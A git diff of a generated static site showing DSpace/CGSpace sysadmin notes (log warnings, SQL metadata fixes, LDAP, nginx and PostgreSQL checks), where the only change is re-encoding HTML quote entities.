                                                                                                                                                                                                                                                                                                                                                                     id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                   -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                    92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                  @@ -344,11 +344,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                • I’ve raised a ticket with Atmire to ask
diff --git a/docs/tags/notes/index.xml b/docs/tags/notes/index.xml
index 6e5bd9dba..e00f6126a 100644
--- a/docs/tags/notes/index.xml
+++ b/docs/tags/notes/index.xml
@@ -105,7 +105,7 @@
 <li>Remove redundant/duplicate text in the DSpace submission license</li>
 <li>Testing the CMYK patch on a collection with 650 items:</li>
 </ul>
-<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
 </code></pre>
@@ -146,7 +146,7 @@
 <ul>
 <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
 </ul>
-<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278';
+<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
  id | collection_id | item_id
 -------+---------------+---------
  92551 | 313 | 80278
@@ -186,11 +186,11 @@ DELETE 1
 <li>CGSpace was down for five hours in the morning while I was sleeping</li>
 <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
 </ul>
-<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
+<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
 </code></pre><ul>
 <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
 <li>I&rsquo;ve raised a ticket with Atmire to ask</li>
@@ -245,7 +245,7 @@ DELETE 1
 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
 <li>It looks like we might be able to use OUs now, instead of DCs:</li>
 </ul>
-<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
 </code></pre>
@@ -281,9 +281,9 @@ $ git rebase -i dspace-5.5
 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
 <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
 </ul>
-<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
 UPDATE 95
-dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
  text_value
 ------------
 (0 rows)
@@ -321,7 +321,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
 <li>I have blocked access to the API now</li>
 <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
 </ul>
-<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
 3168
 </code></pre>
@@ -419,7 +419,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
 <li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
 <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
 </ul>
-<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
 78
 </code></pre>
diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html
index 9ca38f38e..12270003b 100644
--- a/docs/tags/notes/page/2/index.html
+++ b/docs/tags/notes/page/2/index.html
@@ -17,7 +17,7 @@
-
+
@@ -149,7 +149,7 @@
                                                                                                                                                                                                                                                                                                                                                                • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                • It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                 
Read more →
@@ -203,9 +203,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                              • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                              • I think this query should find and replace all authors that have “,” at the end of their names:
-dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                               UPDATE 95
                                                                                                                                                                                                                                                                                                                                                              -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                              +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                text_value
                                                                                                                                                                                                                                                                                                                                                               ------------
                                                                                                                                                                                                                                                                                                                                                               (0 rows)
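The trailing-comma pattern in the query above can be tried outside the database first. This is a minimal sketch, assuming made-up author names and using `sed -E` in place of PostgreSQL's `regexp_replace`. `sed` has no non-greedy `+?`, but because the pattern is anchored with `,$` the greedy form strips the same single trailing comma:

```shell
# Hypothetical author values; the first and third end with a stray comma.
authors=$(printf '%s\n' 'Doe, Jane,' 'Smith, J.' 'Roe, R.,')

# Strip exactly one trailing comma, leaving commas inside the name alone.
cleaned=$(printf '%s\n' "$authors" | sed -E 's/^(.+),$/\1/')

# Count values that still end with a comma (grep -c prints 0 when none match).
remaining=$(printf '%s\n' "$cleaned" | grep -c ',$' || true)

printf '%s\n' "$cleaned"
echo "remaining=$remaining"
```

The final count plays the same role as the follow-up `select` in the notes: zero remaining matches means the replacement caught every value.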
                                                                                                                                                                                                                                                                                                                                                              @@ -261,7 +261,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                            • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                            • There are 3,000 IPs accessing the REST API in a 24-hour period!
-# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
+# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                             3168
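One caveat with the pipeline above: `uniq` only collapses adjacent duplicate lines, so on an unsorted access log it counts runs of the same address rather than distinct addresses, and the figure may overstate the number of IPs. A minimal sketch of the difference, assuming a made-up five-line log whose first field is the client IP:

```shell
# Hypothetical sample log; the first field is the client IP, as in the awk command above.
log=$(mktemp)
printf '%s\n' \
  '10.0.0.1 - - "GET /rest/items"' \
  '10.0.0.2 - - "GET /rest/items"' \
  '10.0.0.1 - - "GET /rest/items"' \
  '10.0.0.1 - - "GET /rest/items"' \
  '10.0.0.3 - - "GET /rest/items"' > "$log"

# uniq alone merges only adjacent duplicates, so this counts runs of the same IP.
runs=$(awk '{print $1}' "$log" | uniq | wc -l | tr -d ' ')

# sort -u removes duplicates wherever they occur, giving the number of distinct IPs.
distinct=$(awk '{print $1}' "$log" | sort -u | wc -l | tr -d ' ')

echo "runs=$runs distinct=$distinct"
rm -f "$log"
```

On this sample the first pipeline reports 4 and the second 3, because `10.0.0.1` appears in two separate runs.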
                                                                                                                                                                                                                                                                                                                                                             
Read more →
diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html
index 84eae3a2f..39c33e266 100644
--- a/docs/tags/notes/page/3/index.html
+++ b/docs/tags/notes/page/3/index.html
@@ -17,7 +17,7 @@
-
+
@@ -146,7 +146,7 @@
                                                                                                                                                                                                                                                                                                                                                          • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                          • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                           78
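Note that `grep idle` matches any row containing the word, which would include sessions that are idle inside an open transaction. A minimal sketch of the distinction, assuming a simplified, made-up two-column excerpt rather than real `pg_stat_activity` output:

```shell
# Hypothetical excerpt of pg_stat_activity output (columns simplified for illustration).
sample=$(printf '%s\n' \
  'cgspace | idle' \
  'cgspace | idle in transaction' \
  'cgspace | active' \
  'dspacetest | idle')

# Same filter as above: any row mentioning both "idle" and "cgspace".
idle_any=$(printf '%s\n' "$sample" | grep idle | grep -c cgspace)

# Stricter variant: cgspace rows whose state is exactly "idle".
idle_only=$(printf '%s\n' "$sample" | grep -c '^cgspace | idle$')

echo "idle_any=$idle_any idle_only=$idle_only"
```

Whether the two counts differ on the real server depends on how many sessions are holding transactions open, which the notes do not say.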
                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                          Read more →